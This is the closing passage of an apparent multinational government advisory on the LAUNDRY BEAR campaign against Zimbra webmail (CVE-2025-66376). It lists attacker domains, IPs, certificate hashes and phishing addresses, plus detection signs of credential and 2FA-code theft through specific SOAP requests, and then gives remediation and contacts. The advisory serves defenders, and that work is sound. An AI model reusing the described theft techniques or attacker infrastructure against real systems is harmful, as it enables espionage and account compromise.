</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>IP Address </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]104 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>8 July 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>15 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]18 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 August 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>14 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>37.120.247[.]228 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>185.86.79[.]95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>104.248.134[.]194 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>11 November 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>17 February 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>64.226.124[.]190 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 December 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>193.238.152[.]66 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 January 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]64 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>3 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>194.156.103[.]193 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>5 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 8: Flowerbed X.509 certificate SHA-1 hashes  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Associated Domain </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>X.509 SHA-1 Hash </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>2e4f314bc9943cab5005d6fde0b271c74d47bc9d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Jul 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>50a87d926621dd06389ba50d86e0ff574ed713a8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>13 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>c5a72420e7bb308d078e62128430897f82194c95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>20 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>14 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8959c4d29e29f02ea94ea8bb21c8df2594c5549d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>24 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Nov 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>62eb76432597694edb01c1fe57aab0cfe03a7178 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>25 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>27 Sep 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>cddf5c3be1e07f28140aed165b929bf2d614922a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Nov 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>17 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18b3ad442ce73cc8656d51d75bbd7c855f2cb7e8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18 Dec 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>28 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>1b25041ececf2457eef0270fc1d785cec8ec9ded </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>21 Jan 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>10 Feb 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>e4fe6466a4f9a4249fe330651e914e45bbdca44a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>5 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>22 Mar 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>b6b77c9a455225d525834a403ca9ef5481ed0447 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>30 Mar 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>LAUNDRY BEAR has used the following email addresses to procure resources used for this campaign:</p>
<ul>
<li>ivanka.zurabishvili@proton[.]me,</li>
<li>zmul1@buildandconsulting[.]com,</li>
<li>garrysmithme@pinmx[.]net, and</li>
<li>hostingclient@pinmx[.]net.</li>
</ul>
<h4><strong>Phishing distribution</strong></h4>
<p>LAUNDRY BEAR primarily relied on ProtonMail for distribution of malicious email. However, as stated above, LAUNDRY BEAR’s more recent efforts likely have shifted to distributing the payload through previous victims.  </p>
<p>The following email addresses have distributed payloads attributed to this campaign:</p>
<ul>
<li>c.laurent.ejfa@proton[.]me,</li>
<li>j.moreau.epsc@proton[.]me,</li>
<li>liberty.insights@proton[.]me,</li>
<li>certain email addresses (presumably compromised) at the isofts.kiev[.]ua domain (i.e., ending with @isofts.kiev[.]ua), and</li>
<li>certain email addresses (presumably compromised) at the navs.edu[.]ua domain (i.e., ending with @navs.edu[.]ua).</li>
</ul>
<p>Additionally, the following are SHA-256 hashes of email samples containing the malicious payload attributed to this campaign:</p>
<ul>
<li>98df604ecc57f884a2e6ce3266a0013ad64455cac48442c2312cfa4765007aaf,</li>
<li>60db9abae75cd8ccc49dd7ea5feb41677566dcd442f12ebc5745ffd2810fb874,</li>
<li>b1f5beb1175fc5c7d1806a2f0d900eb124c54f0286c5c52b66eea7a6633adb1d, and</li>
<li>1517b3caa495f6c4e832df9c75fc94667e3c233773f7fa4e056d5e30e5ead760.</li>
</ul>
<h4><strong>Post-compromise artifacts</strong></h4>
<p>Currently, the script does not remove artifacts. This leaves additional opportunities to identify victims of this activity. While emphasis should always be placed on consistent monitoring of network traffic and endpoint activity, there are a variety of persistent artifacts described below that can be used to identify victims of this campaign.</p>
<p>This <em>Ulej </em>capability relies on creating a significant number of SOAP requests to collect account information for exfiltration. ZCS logs from these requests are stored, by default, in the <em>/opt/zimbra/log/mailbox.log</em> file [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. A significant amount of SOAP request activity that aligns with what was described in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> and <a href="https://www.cisa.gov/#collection1">Collection</a> sections of this advisory could indicate a potential compromise. Specific examples of high-risk SOAP request activity might include:</p>
<ul>
<li>Many <em>SearchGalRequest </em>command requests from a single user over a short period of time;</li>
<li>Use of the <em>CreateAppSpecificPasswordRequest</em> command, especially in cases where it is creating an Application Passcode named “ZimbraWeb”; and</li>
<li>Use of the GetScratchCodesRequest command.</li>
</ul>
<p>While LAUNDRY BEAR uses the localStorage property to track what days had emails previously exfiltrated, defenders can use this property to identify victims of this campaign and determine the scope of exfiltrated information [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. Review of the items stored in that property for an organization’s ZCS webmail client page on an endpoint device could indicate compromise if there are items named with a format of <em>zd_comp_YYYY-MM-DD,</em> as explained in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory.</p>
<p>While Application Passcodes have non-malicious purposes, in this case instances of these passcodes with the name “ZimbraWeb” are almost certainly malicious. The ZCS webmail application can support 2FA natively and does not require the use of an Application Passcode, so there is no reason that there should be one named “ZimbraWeb.”</p>
<p>In instances where organizations identify victims of this campaign, they should also examine the inbox of the suspected victim for the original phishing email [<a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis" target="_blank">D3-MA</a>]. If an email that has a payload exploiting <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a> is discovered, <strong>steps should be taken immediately to identify and quarantine other instances of emails with similar body content, senders, and subject lines to prevent further exploitation and exfiltration.  </strong></p>
<h3><em><strong>Remediation</strong></em></h3>
<p>In the event an organization identifies activity associated with this campaign, that organization should take steps to minimize further exploitation. The organization should consider requesting that employees minimize use of the ZCS webmail client until the organization updates to a patched version that is not vulnerable to <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>.</p>
<p>Organizations should use identifiers from the <a href="https://www.cisa.gov/#ioc1">IOCs</a> section of this report to identify any individuals compromised by this campaign and record the date(s) of compromise(s) to determine the scale and scope of emails exfiltrated.</p>
<p>All users from the organization should have all Application Passcodes and 2FA scratch keys revoked. Affected organizations should require all employees to change passwords in line with establishing minimum password strength requirements [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishMinimumPasswordStrength3B">CPG 3.B</a>] and creating unique credentials [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#CreateUniqueCredentials3C">CPG 3.C</a>], specifically noting that compromised employees might have had any password stored in a password manager exfiltrated.</p>
<h2><strong>Works cited</strong></h2>
<p>[1<a class="ck-anchor"></a>] Netherlands General Intelligence and Security Service (AIVD) and Netherlands Defence Intelligence and Security Service (MIVD). AIVD and MIVD identify a new Russian cyber threat actor. 2025. <a href="https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf" target="_blank">https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf</a></p>
<p>[2]<a class="ck-anchor"></a> Microsoft Corporation. New Russia-affiliated actor Void Blizzard targets critical sectors for espionage. 2025. <a href="https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/" target="_blank">https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/</a></p>
<p>[3]<a class="ck-anchor"></a> Palo Alto Networks Unit 42. Russian Global Webmail Espionage. 2026. <a href="https://unit42.paloaltonetworks.com/russian-webmail-espionage/">https://unit42.paloaltonetworks.com/russian-webmail-espionage/ </a></p>
<p>[4]<a class="ck-anchor"></a> Proofpoint. TA488 Targets Zimbra Mailservers with Half-Click Exploits. 2026. <a href="https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit">https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit</a></p>
<p>[5]<a class="ck-anchor"></a> Seqrite. Operation GhostMail: Russian APT exploits Zimbra Webmail to Target Ukraine State Agency. 2026. <a href="https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/" target="_blank">https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/  </a></p>
<h2><strong>Footnotes</strong></h2>
<p><sup>1</sup><a class="ck-anchor"></a> Národní úřad pro kybernetickou a informační bezpečnost<br><sup>2</sup><a class="ck-anchor"></a><sup> </sup>Forsvarets Efterretningstjeneste<br><sup>3</sup><a class="ck-anchor"></a><sup> </sup>Välisluureamet<br><sup>4</sup><a class="ck-anchor"></a> Sotilastiedustelu<br><sup>5</sup><a class="ck-anchor"></a><sup> </sup> Suojelupoliisi<br><sup>6</sup><a class="ck-anchor"></a> Direction générale de la sécurité intérieure<br><sup>7</sup><a class="ck-anchor"></a> Agence nationale de la sécurité des systèmes d’information<br><sup>8</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Esterna<br><sup>9</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Interna<br><sup>10</sup><a class="ck-anchor"></a> Serviciul de Informații și Securitate al Republicii Moldova<br><sup>11 </sup><a class="ck-anchor"></a>Agencja Wywiadu<br><sup>12</sup><a class="ck-anchor"></a><sup> </sup>Służba Kontrwywiadu Wojskowego<br><sup>13</sup><a class="ck-anchor"></a><sup> </sup>Centro Nacional de Inteligencia<br><sup>14 </sup><a class="ck-anchor"></a>Nationellt Cybersäkerhetscenter<br><sup>15</sup><a class="ck-anchor"></a> MITRE and ATT&amp;CK are registered trademarks of The MITRE Corporation. MITRE D3FEND is a trademark of The MITRE Corporation.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>The authoring agencies acknowledge the contributions to this advisory from Palo Alto Networks Unit 42 and Proofpoint.</p>
<h2><strong>Disclaimer of endorsement</strong></h2>
<p>The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<p>Organizations have no obligation to respond or provide information back to the authoring organizations in response to this joint advisory. If, after reviewing the information provided, an organization decides to provide information to the authoring organizations, reporting must be consistent with all applicable laws and policies.</p>
<h2><strong>Purpose</strong></h2>
<p>This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h2><strong>Contact</strong></h2>
<div class="SCXW95230887 BCX8">
<div class="OutlineElement Ltr SCXW95230887 BCX8">
<p><strong>United States organizations </strong></p>
<ul>
<li><strong>National Security Agency</strong> <br>Cybersecurity Report Feedback: <a href="mailto:CybersecurityReports@nsa.gov" target="_blank"><u>CybersecurityReports@nsa.gov</u></a> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DIB_Defense@cyber.nsa.gov" target="_blank"><u>DIB_Defense@cyber.nsa.gov</u></a> <br>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, <a href="mailto:MediaRelations@nsa.gov" target="_blank"><u>MediaRelations@nsa.gov</u></a> </li>
<li><strong>Cybersecurity and Infrastructure Security Agency</strong> <br>CISA’s 24/7 Operations Center (<a href="mailto:contact@cisa.dhs.gov" target="_blank"><u>contact@cisa.dhs.gov</u></a>), or by calling 1-844-Say-CISA (1-844-729-2472). </li>
<li><strong>Federal Bureau of Investigation</strong> <br>If you or someone you know has fallen victim to this campaign, file a complaint with <a class="Hyperlink SCXW95230887 BCX8" href="https://www.ic3.gov/" target="_blank" rel="noreferrer noopener"><u>IC3</u></a>. </li>
<li><strong>Defense Counterintelligence and Security Agency </strong> <br>DCSA Counterintelligence, Cyber Mission Center, Cyber Threat Operations Branch: <a href="mailto:DCSA.CI.CyberOps@mail.mil" target="_blank"><u>DCSA.CI.CyberOps@mail.mil</u></a> <br>Cleared Contactors (CCs) should contact their DCSA Counterintelligence Special Agent to report information pertaining to suspicious contacts or physical/digital efforts to obtain illegal or unauthorized access to the CC’s cleared facility/information, as required by 32 CFR 117. <br>Media/Public Inquiries: <a href="mailto:dcsa.quantico.dcsa-hq.mbx.pa@mail.mil" target="_blank"><u>dcsa.quantico.dcsa-hq.mbx.pa@mail.mil</u></a>  </li>
<li><strong>Department of Defense Cyber Crime Center </strong> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DC3.DCISE@us.af.mil" target="_blank"><u>DC3.DCISE@us.af.mil</u></a> <br>Defense Industrial Base mandatory cyber incident reporting as required by 10 U.S. Code Sections 391 and 393 and Defense Federal Acquisition Regulation Supplement (DFARS) 252.204-7012 is submitted at <a href="https://dibnet.dod.mil/" target="_blank"><u>https://dibnet.dod.mil</u></a> <br>Media Inquiries / Press Desk: <a href="mailto:DC3.Information@us.af.mil" target="_blank"><u>DC3.Information@us.af.mil</u></a> </li>
<li><strong>Naval Criminal Investigative Service</strong> <br>To report criminal activity impacting the United States Navy, go to <a href="http://www.ncis.navy.mil/" target="_blank"><u>www.ncis.navy.mil</u></a> and click “Submit a Tip”</li>
</ul>
<p><strong>Dutch organizations</strong> </p>
<ul>
<li>Defence Intelligence and Security Service (MIVD): <a href="https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid" target="_blank"><u>https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid</u></a>  </li>
<li>General Intelligence and Security Service (AIVD): <a href="https://www.aivd.nl/" target="_blank"><u>https://www.aivd.nl</u></a> </li>
</ul>
<p><strong>Australian organizations </strong></p>
<ul>
<li>Australian Signals Directorate <br>Visit <a href="https://www.cyber.gov.au/about-us/about-asd-acsc/contact-us#no-back" target="_blank"><u>cyber.gov.au</u></a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. </li>
</ul>
<p><strong>Canadian organizations </strong></p>
<ul>
<li>The Canadian Centre for Cyber Security (Cyber Centre), part of the Communications Security Establishment, encourages Canadian organizations to report cyber incidents and to strengthen the security of their networking devices.  <br>Report an incident or suspicious activity to the Cyber Centre by email at <a href="mailto:contact@cyber.gc.ca" target="_blank"><u>contact@cyber.gc.ca</u></a>, online via the reporting tool <a href="https://www.cyber.gc.ca/en/incident-management" target="_blank"><u>Report a cyber incident - Canadian Centre for Cyber Security</u></a> or by phone at 1-833-CYBER-88 (1-833-292-3788). </li>
</ul>
<p><strong>New Zealand organizations </strong></p>
<ul>
<li>New Zealand National Cyber Security Centre (NCSC-NZ): <a href="mailto:info@ncsc.govt.nz" target="_blank"><u>info@ncsc.govt.nz</u></a> </li>
</ul>
<p><strong>United Kingdom organizations </strong></p>
<ul>
<li>Report significant cyber security incidents to <a href="https://ncsc.gov.uk/report-an-incident" target="_blank"><u>ncsc.gov.uk/report-an-incident</u></a> (monitored 24/7) </li>
</ul>
<p><strong>Estonia organizations </strong></p>
<ul>
<li>Estonian Foreign Intelligence Service (EFIS): <a href="mailto:info@valisluureamet.ee" target="_blank"><u>info@valisluureamet.ee</u></a> </li>
</ul>
<p><strong>Finnish organizations </strong></p>
<ul>
<li>Finnish Security and Intelligence Service: <a href="https://supo.fi/en/contact" target="_blank"><u>supo.fi/en/contact</u></a> </li>
</ul>
<p><strong>French organizations </strong></p>
<ul>
<li>French organizations are encouraged to report suspicious activity or incident related information found in this advisory by contacting ANSSI/CERT-FR at: <a href="mailto:cert-fr@ssi.gouv.fr" target="_blank"><u>cert-fr@ssi.gouv.fr</u></a> or by phone at: 3218 or +33 9 70 83 32 18. </li>
</ul>
<p><strong>Italian Organizations </strong></p>
<ul>
<li>Italian External Intelligence and Security Agency (AISE):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a>  </li>
<li>Italian Internal Intelligence and Security Agency (AISI):  <br>Visit <a href="https://www.sicurezzanazionale.gov.it/" target="_blank"><u>https://www.sicurezzanazionale.gov.it/</u></a> </li>
</ul>
<div class="OutlineElement Ltr SCXW214395380 BCX8">
<p><strong>Moldovan organizations </strong></p>
</div>
<div class="ListContainerWrapper SCXW214395380 BCX8">
<ul type="disc">
